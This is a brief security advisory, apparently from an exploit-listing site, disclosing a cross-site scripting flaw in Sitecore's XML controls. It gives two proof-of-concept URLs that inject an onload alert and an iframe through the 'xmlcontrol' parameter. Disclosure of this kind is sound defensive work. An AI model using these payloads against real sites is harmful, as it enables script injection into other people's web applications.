Sitecore XML Cross Site Scripting

2014.01.30

Credit: Mark Litchfield

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Hey All,

Sitecores special way of displaying XML Controls directly allows for a 
Cross Site Scripting Attack  more can be achieved with these XML 
Controls and will be documented in another vulnerability report

http://target/?xmlcontrol=body%20onload=alert(123)
http://target/?xmlcontrol=iframe%20src=https://www.google.com/images/srpr/logo11w.png

More information can be found at 
http://www.securatary.com/vulnerabilities - Also listed is a useful text 
file for use with Burp when auditing SiteCore.

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Sitecore XML Cross Site Scripting

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Sitecore XML Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.